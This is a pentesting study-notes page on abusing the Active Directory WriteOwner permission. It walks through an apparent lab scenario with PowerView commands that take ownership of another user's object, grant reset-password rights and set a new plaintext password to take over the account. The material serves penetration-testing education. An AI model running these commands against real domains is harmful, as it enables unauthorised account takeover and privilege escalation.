Undergrad CyberSec Notes
  • About Me
  • Course Reviews
    • Certified Red Team Expert
  • Walkthroughs (OSCE)
    • Introduction
    • Vulnserver - TRUN Command
    • Vulnserver - GMON Command
    • Vulnserver - HTER Command
    • Vulnserver - LTER Command
    • Vulnserver - KSTET Command
    • Vulnserver - GTER Command
    • Exploiting HP OpenView NNM - B.07.53
  • Walkthroughs (OSCP)
    • Introduction
    • Vulnhub - Cynix
    • Vulnhub - MyExpense
    • Hack The Box - Monteverde
    • Hack The Box - Control
    • Hack The Box - Resolute
    • Hack The Box - Sauna
  • Active Directory - Enumeration
    • PowerView CheatSheet
  • Active Directory - ACL Abuse
    • WriteOwner Exploit
    • GenericWrite Exploit
    • Self Exploit
  • Privilege Escalation
    • Windows Priv Esc
  • Powershell
    • Basic PowerShell for Pentesters
    • Powershell
  • Useful Commands
    • General Tips
  • Active Directory Enumeration Cheetsheet
Powered by GitBook
On this page
  • What is the WriteOwner Permission For?
  • Scenario:

Was this helpful?

  1. Active Directory - ACL Abuse

WriteOwner Exploit

Refer to: https://www.youtube.com/watch?v=ob9SgtFm6_g&t=1431s

PreviousPowerView CheatSheetNextGenericWrite Exploit

Last updated 4 years ago

Was this helpful?

What is the WriteOwner Permission For?

Active Directory objects such as users and groups are securable objects and DACL/ACEs define who can read/modify those objects (i.e change account name, reset password, etc). The WriteOwner permission can be abused by an attacker to change the object owner to an attacker controlled user and take over the object

Scenario:

You have managed to compromise an account belonging to Tom. Running Bloodhound identified that there were was no direct access from Tom's account to Domain Admins. Checking Outband Object Control reveled an attack path from Tom to the Backup Admin group through Claire.

Attack Path

  1. Tom has WriteOwner permissions over Claire

  2. Claire has GenericWrite permissions over the group BACKUP_ADMINS

  3. BACKUP_ADMINS sounds interesting :)

### Set tom as the owner of claire’s ACL 
Set-DomainObjectOwner -identity claire -OwnerIdentity tom 

### Give tom permissions to change passwords on that ACL
Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword 

### Create powershell credential and change credentials. 
### NOTE!! IN A REAL PENTEST YOU WOULD ENABLE REVERSIBLE ENCRYPTION OR MAKE USER KERBEROSTABLE OR SOMETHING ELSE AND NOT CHANGE THE PASSWORD IN A PRODUCTION ENVIRONMENT
$cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force
Set-DomainUserPassword -identity claire -accountpassword $cred

Success. You can now login as Claire using the new password: qwer1234QWER!@#$

In order to easily take advantage of the WriteOwner and GenericWrite permissions, we’ll use PowerView, which is part of the collection.

PowerSploit
Outband Control Option
Attack Path Identified
Screenshot for reference